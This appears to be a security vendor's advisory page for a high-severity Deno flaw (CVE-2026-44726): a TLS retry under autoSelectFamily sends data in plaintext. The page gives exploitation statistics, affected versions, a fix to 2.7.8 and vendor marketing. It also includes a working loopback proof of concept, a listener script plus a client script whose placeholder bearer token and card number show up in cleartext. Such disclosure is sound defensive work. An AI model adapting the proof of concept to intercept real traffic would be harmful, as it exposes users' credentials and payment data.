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HIGH severity

GHSA-chqv-56wv-7564

HIGH

GHSA-chqv-56wv-7564 is a high-severity (CVSS 7.4) CWE-319 vulnerability in deno. O3 Security confirms whether GHSA-chqv-56wv-7564 is actually reachable in your code before you act, and blocks exploitation at runtime until you patch.

Deno's TLS retry copies stale upgrade hook, risking plaintext traffic

Also known asCVE-2026-44726
Published
May 27, 2026
Updated
Jul 20, 2026
Affected
1 pkg
Patched
1 / 1
Exploits
None indexed
Exploitation data as of Aug 9, 2026 · OSV.dev, NVD, FIRST.org (EPSS)

Exploitation Status

No confirmed exploitation observed yet

  • A successful exploit gives an attacker total control of the affected component, not partial access.
  • CISA’s own triage has not observed active exploitation or public proof-of-concept code for this CVE as of its last assessment.

Exploitation and automatability from CISA’s SSVC triage for GHSA-chqv-56wv-7564.

EPSS Exploitation Probability

via FIRST.org ↗
0.2%probability of exploitation in next 30 days
Lower Risk0.00%
Lower risk than most CVEs7th percentile — riskier than 7% of all scored CVEsHighest risk
0.00%0.22%0.45%0.67%0.1%0.2%0.2%Jul 26Aug 26Aug 26

EPSS (Exploit Prediction Scoring System) is a daily probability model maintained by FIRST.org. It estimates the likelihood a CVE will be exploited in production environments within the next 30 days, derived from real-world threat intelligence signals.

How urgent is this, really

GHSA-chqv-56wv-7564 plotted by exploitation likelihood (EPSS) against impact (CVSS). The shaded corner — EPSS 50%+ and CVSS 7.0+ — is where this CVE doesn't sit, though severity or exploitability alone can still warrant action.

Where this sits among everything scored

Of 0 CVEs with a current EPSS score, this one falls in the < 10% band (highlighted). Real counts from FIRST.org, not a sample — log-scaled since the landscape is heavily right-skewed.

Real-World Exposure

1 pkg affected
🦀deno

Real-time download stats are indexed for npm and PyPI packages. This vulnerability affects crates.io packages — download data is not available via public APIs for these ecosystems.

Description

Summary

A flaw in Deno's Node.js tls compatibility layer could cause a TLS client to transmit application data in plaintext after a connection retry. When `autoSelectFamily was enabled and the first address-family attempt failed, the socket reinitialization path reused a stale TLS upgrade hook that was bound to the original, failed handle.

As a result, the replacement TCP connection was never upgraded to TLS, and any data the application wrote before the secureConnect event travelled over the network unencrypted.

A network attacker positioned to cause the initial connection attempt to fail (for example, by dropping IPv6 traffic on a dual-stack host) could deterministically trigger the fallback path and observe or tamper with traffic that the application believed was TLS-protected.

Affected APIs: Applications using Deno's node:tls or node:https surface with autoSelectFamily enabled (the default) that wrote to the socket before the secureConnect event.

Proof of concept

attacker.mjs (captures whatever the client sends)

import net from "node:net";

const server = net.createServer((socket) => {
  console.log("[attacker] client connected from", socket.remoteAddress);
  socket.on("data", (chunk) => {
    // If TLS were working, this would be an opaque ClientHello.
    // If the bug fires, we see the application payload in cleartext.
    console.log("[attacker] received", chunk.length, "bytes:");
    console.log(chunk.toString("utf8"));
  });
});

server.listen(4444, "127.0.0.1", () => {
  console.log("[attacker] listening on 127.0.0.1:4444");
});

victim.mjs (a normal-looking TLS client)

import tls from "node:tls";

const socket = tls.connect({
  host: "api.example.invalid",
  port: 4444,
  autoSelectFamily: true, // Node-compat default

  // First address is a black hole (nothing on [::1]:4444),
  // so autoSelectFamily falls back to the second address.
  // In a real attack, the on-path attacker arranges this via
  // routing, DNS, or by dropping the first SYN.
  lookup: (_host, _opts, cb) => {
    cb(null, [
      { address: "::1",       family: 6 }, // fails -> retry
      { address: "127.0.0.1", family: 4 }, // attacker
    ]);
  },

  rejectUnauthorized: false,
});

// Application writes BEFORE secureConnect — common pattern in
// Node clients that pipe a request body or send a greeting.
socket.write("POST /v1/charge HTTP/1.1\r\n");
socket.write("Authorization: Bearer sk_live_SECRET_TOKEN\r\n");
socket.write("Content-Type: application/json\r\n\r\n");
socket.write(JSON.stringify({ amount: 100, card: "4242424242424242" }));

socket.on("secureConnect", () => console.log("[victim] secureConnect"));
socket.on("error",         (e) => console.log("[victim] error:", e.message));

In terminal 1 deno run --allow-net attacker.mjs In terminal 2 deno run --allow-net victim.mjs

Expected vs. observed

On a patched Deno (≥ 2.7.8), the attacker terminal sees an opaque TLS ClientHello (a binary blob starting with 0x16 0x03 0x01 …), and the victim eventually errors out because the attacker isn't speaking TLS.

On a vulnerable Deno (≥ 2.0.0, < 2.7.8), the attacker terminal prints:

[attacker] received 41 bytes:
POST /v1/charge HTTP/1.1
Authorization: Bearer sk_live_SECRET_TOKEN
...

The bearer token, the request body, and the card number all appear in plaintext, even though the application used tls.connect.

Affected Packages

1 total 1 fixed
EcosystemPackageVulnerable rangeFix
🦀crates.iodeno2.0.0&&< 2.7.82.7.8

Detection & mitigation playbook

Open-source dependency
  1. Detect

    Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for deno. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.

  2. Fix

    Update deno to 2.7.8 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-chqv-56wv-7564 is resolved across your whole dependency graph.

  3. Workarounds

    If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.

  4. How O3 protects you

    O3 pinpoints whether GHSA-chqv-56wv-7564 is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.

Tailored to GHSA-chqv-56wv-7564. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.

Frequently Asked Questions

## Summary A flaw in Deno's Node.js tls compatibility layer could cause a TLS client to transmit application data in plaintext after a connection retry. When `autoSelectFamily was enabled and the first address-family attempt failed, the socket reinitialization path reused a stale TLS upgrade hook that was bound to the original, failed handle. As a result, the replacement TCP connection was never upgraded to TLS, and any data the application wrote before the `secureConnect` event travelled over the network unencrypted. A network attacker positioned to cause the initial connection attempt to
O3 Security · Impact-Aware SCA

Is GHSA-chqv-56wv-7564 in your dependencies?

O3 detects GHSA-chqv-56wv-7564 across crates.io dependencies and uses function-level reachability to confirm whether the vulnerable code path is actually reachable — not just present. No false positives.